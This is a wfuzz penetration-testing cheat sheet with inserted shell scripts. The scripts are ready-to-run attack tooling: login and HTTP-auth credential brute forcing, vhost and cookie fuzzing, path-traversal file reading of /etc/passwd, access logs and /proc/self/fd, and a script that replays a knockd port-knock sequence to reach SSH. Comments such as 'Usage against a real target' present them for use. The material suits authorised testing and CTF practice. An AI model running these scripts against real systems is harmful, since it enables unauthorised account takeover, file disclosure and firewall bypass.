wfuzz
Cheat Sheet
Login Form bruteforce
POST, Single list, filter string (hide)
POST, 2 lists, filter code (show)
GET, 2 lists, filter string (show), proxy, cookies
Directory / RESTful bruteforce
Path parameters bruteforce
Header Authentication
Basic, 2 lists, filter string (show), proxy
NTLM, 2 lists, filter string (show), proxy
Cookie/Header bruteforce (vhost brute)
Cookie, filter code (show), proxy
User-Agent, filter code (hide), proxy
Host
HTTP Verbs (methods) bruteforce
Using file
Using inline list
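The headings above name the flag combinations without the commands. As an added example (not from the original cheat sheet), the wrappers below assemble each wfuzz invocation; every URL, wordlist path, form field name, proxy address and status code in them is an assumption to replace per target. FUZZ is substituted from the first -z payload and FUZ2Z from the second; --hs/--ss hide or show by regex on the body, --hc/--sc by status code, --hh by response length in characters. Set WFUZZ_DRY_RUN=1 to print the command instead of running it.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: shell wrappers for the
# wfuzz invocations the headings above describe. URLs, wordlists, form field
# names and proxy addresses are assumptions; adjust them per engagement.
# Set WFUZZ_DRY_RUN=1 to print the command instead of executing it.

run_wfuzz() {
    # Print the command (one single-quoted argument each) so it can be copied,
    # then execute it unless dry-run mode is set.
    printf 'wfuzz'; for a in "$@"; do printf " '%s'" "$a"; done; printf '\n'
    [ -n "${WFUZZ_DRY_RUN:-}" ] || wfuzz "$@"
}

# --- Login form ---------------------------------------------------------
# POST, single list: hide every response whose body matches the failure text.
login_post_single() {   # url wordlist failure_regex
    run_wfuzz -c -z "file,$2" -d "username=admin&password=FUZZ" --hs "$3" -u "$1"
}

# POST, two lists (users x passwords): show only one status code, e.g. 302.
login_post_two_lists() {   # url users passwords show_code
    run_wfuzz -c -z "file,$2" -z "file,$3" -d "username=FUZZ&password=FUZ2Z" --sc "$4" -u "$1"
}

# GET, two lists, show bodies matching a success string, via a proxy
# (addr:port:HTTP), sending an existing session cookie.
login_get_proxy_cookie() {   # url_with_FUZZ_and_FUZ2Z users passwords success_regex proxy cookie
    run_wfuzz -c -z "file,$2" -z "file,$3" --ss "$4" -p "$5" -b "$6" -u "$1"
}

# --- Directories, files and path parameters -----------------------------
# Directory/file brute force with an inline extension list; hide 404s.
dir_bruteforce() {   # base_url wordlist
    run_wfuzz -c -z "file,$2" -z list,php-html-txt --hc 404 -u "$1/FUZZ.FUZ2Z"
}

# RESTful / path parameter brute force: the payload is a path segment.
path_param_bruteforce() {   # base_url wordlist
    run_wfuzz -c -z "file,$2" --hc 404 -u "$1/api/FUZZ"
}

# --- Header authentication ----------------------------------------------
basic_auth_bruteforce() {   # url users passwords proxy
    run_wfuzz -c -z "file,$2" -z "file,$3" --basic FUZZ:FUZ2Z --hc 401 -p "$4" -u "$1"
}
ntlm_auth_bruteforce() {   # url users passwords proxy
    run_wfuzz -c -z "file,$2" -z "file,$3" --ntlm FUZZ:FUZ2Z --hc 401 -p "$4" -u "$1"
}

# --- Cookie / User-Agent / Host (vhost) ---------------------------------
cookie_bruteforce() {   # url wordlist cookie_name show_code proxy
    run_wfuzz -c -z "file,$2" -b "$3=FUZZ" --sc "$4" -p "$5" -u "$1"
}
user_agent_bruteforce() {   # url wordlist hide_code proxy
    run_wfuzz -c -z "file,$2" -H "User-Agent: FUZZ" --hc "$3" -p "$4" -u "$1"
}
# vhost brute force: hide responses the size (chars) of the default vhost.
vhost_bruteforce() {   # url wordlist domain default_size
    run_wfuzz -c -z "file,$2" -H "Host: FUZZ.$3" --hh "$4" -u "$1"
}

# --- HTTP verbs ---------------------------------------------------------
verbs_from_file() {   # url methods_file
    run_wfuzz -c -z "file,$2" -X FUZZ -u "$1"
}
verbs_inline() {   # url
    run_wfuzz -c -z list,GET-HEAD-POST-PUT-PATCH-DELETE-OPTIONS-TRACE -X FUZZ -u "$1"
}
```

Before filtering by status code, run once with no filter and note the code, word count and size of a known-bad attempt; that baseline row is what --hc/--hw/--hh should hide.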
Directory & Files Bruteforce
Tool to bypass Webs
LFI brute force
Use this to look for an LFI vulnerability.
Filtering by word count (--hw) or status code (--hc) will usually be needed to hide the error page the application returns for files that do not exist.
Setting a session cookie may also be needed, with -b "PHPSESSID=something".
Files worth reading:
/var/log/apache2/access.log
/proc holds useful information about the running processes (/proc/self is the process serving the request, i.e. the web server).
try
/proc/self/cmdline
wfuzz -z range,0-100 -u http://IP/manage.php?file=../../../../../../proc/self/fd/FUZZ
-b "SESSIONCOOKIE" may be needed; FUZZ iterates over the file descriptor numbers 0-100 of the web server process, and --hw with the baseline word count hides the descriptors that do not exist.
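The notes above say a --hw filter and a session cookie "may be needed" but not where the number for --hw comes from. As an added example (not from the original page), the script below fetches the error page for a file that cannot exist, counts its words, and uses that count as --hw for the /proc/self/fd fuzz and for a list of the files named above. The URL prefix, parameter name and cookie value are assumptions; count_words approximates wfuzz's Words column, so cross-check it against the baseline row in wfuzz's own output. Set WFUZZ_DRY_RUN=1 to print the command instead of running it.

```shell
#!/bin/sh
# Added example, not part of the original notes: derive the --hw value for an
# LFI fuzz from a baseline request, then fuzz /proc/self/fd/N and a file list.
# The target URL prefix, parameter name and cookie value are assumptions.
# Set WFUZZ_DRY_RUN=1 to print the wfuzz command instead of running it.

run_wfuzz() {
    printf 'wfuzz'; for a in "$@"; do printf " '%s'" "$a"; done; printf '\n'
    [ -n "${WFUZZ_DRY_RUN:-}" ] || wfuzz "$@"
}

# Count whitespace-separated words, which is (approximately) what wfuzz shows
# in its Words column; compare with the baseline row and adjust if they differ.
count_words() {   # text
    printf '%s' "$1" | wc -w | tr -d ' '
}

# Fetch the error page returned for a path that cannot exist and return its
# word count: that is the --hw value that hides every "miss".
lfi_baseline_words() {   # url_prefix cookie   e.g. "http://IP/manage.php?file=" "PHPSESSID=..."
    count_words "$(curl -s -b "$2" "${1}../../../../../../does/not/exist")"
}

# Brute force the open file descriptors (0-100) of the process serving the
# request, hiding responses with the baseline word count.
lfi_fd_fuzz() {   # url_prefix cookie baseline_words
    run_wfuzz -c -z range,0-100 --hw "$3" -b "$2" -u "${1}../../../../../../proc/self/fd/FUZZ"
}

# Same traversal, payloads taken from a file of paths (relative: no leading /).
lfi_files_fuzz() {   # url_prefix cookie baseline_words list_file
    run_wfuzz -c -z "file,$4" --hw "$3" -b "$2" -u "${1}../../../../../../FUZZ"
}

# Constructed list: the files named in the notes above plus /etc/passwd as the
# standard first check for a working traversal.
write_lfi_list() {   # list_file
    cat > "$1" <<'EOF'
etc/passwd
var/log/apache2/access.log
proc/self/cmdline
proc/sched_debug
etc/knockd.conf
EOF
}

# Usage against a real target:
#   base=$(lfi_baseline_words 'http://IP/manage.php?file=' 'PHPSESSID=...')
#   lfi_fd_fuzz 'http://IP/manage.php?file=' 'PHPSESSID=...' "$base"
```

If every descriptor is hidden, the baseline count is wrong (the error page may embed the requested path, changing its word count per request); in that case filter on --hh or --hc instead.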
If SSH is filtered, try this:
/proc/sched_debug is sometimes useful: it lists every running task, so it reveals services such as knockd even when their /proc/PID/cmdline is not readable.
If knockd is running, it is a port-knocking daemon, which means some ports are filtered by the firewall until the right sequence of ports is hit.
/etc/knockd.conf
It may look like this.
In this case, to reach SSH we need to hit ports 7569, 8475 and 9842 in that order, within the configured timeout.
Knock on those ports with nc, then try ssh.
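The steps above (read knockd.conf, knock in order, then ssh) as an added example that is not part of the original notes. The knockd.conf embedded here is constructed to match the sequence quoted above (7569,8475,9842) and is not the file from any real target; section names, ports and timeouts will differ. nc -z for TCP and a one-byte datagram for UDP are assumptions about the local nc; knockd's default is to watch TCP SYNs.

```shell
#!/bin/sh
# Added example, not part of the original notes: read the knock sequence out of
# a knockd.conf (e.g. one retrieved through the LFI), replay it with nc in
# order, then try ssh. The sample config below is constructed for this example.

# Print the "sequence = ..." value of one [section] of a knockd.conf, e.g.
# "7569,8475,9842", or "7000:udp,8000:tcp" when per-port protocols are given.
knock_sequence() {   # conf_file section_name
    awk -v want="[$2]" '
        $1 == want                 { in_sec = 1; next }   # entered the wanted section
        /^[ \t]*\[/                { in_sec = 0 }         # any other header ends it
        in_sec && $1 == "sequence" {
            sub(/^[^=]*=[ \t]*/, ""); gsub(/[ \t]/, ""); print; exit
        }' "$1"
}

# Protocol of one sequence entry ("7569" -> tcp, "7000:udp" -> udp).
entry_proto() {   # entry
    case "$1" in *:*) printf '%s' "${1#*:}" ;; *) printf 'tcp' ;; esac
}

# Port number of one sequence entry.
entry_port() {   # entry
    printf '%s' "${1%%:*}"
}

# Knock: hit every port in order. A TCP knock is just a SYN, so nc -z against
# a closed port "failing" is expected; a UDP knock needs a datagram to go out.
# All knocks must land within seq_timeout seconds, hence the 1 s nc timeout.
knock() {   # host comma_separated_sequence
    for entry in $(printf '%s' "$2" | tr ',' ' '); do
        port=$(entry_port "$entry")
        if [ "$(entry_proto "$entry")" = udp ]; then
            printf 'x' | nc -u -w 1 "$1" "$port" >/dev/null 2>&1 || true
        else
            nc -z -w 1 "$1" "$port" >/dev/null 2>&1 || true
        fi
    done
}

# Constructed sample knockd.conf with an open and a close sequence.
write_sample_knockd_conf() {   # out_file
    cat > "$1" <<'EOF'
[options]
    UseSyslog

[openSSH]
    sequence    = 7569,8475,9842
    seq_timeout = 5
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7569
    seq_timeout = 5
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
EOF
}

# Usage against a real target, once knockd.conf has been retrieved:
#   knock HOST "$(knock_sequence knockd.conf openSSH)" && ssh user@HOST
```

Pick the section whose command opens the port you want (here openSSH, not closeSSH); the command line also tells you which port the knock unlocks, so check it before assuming it is 22.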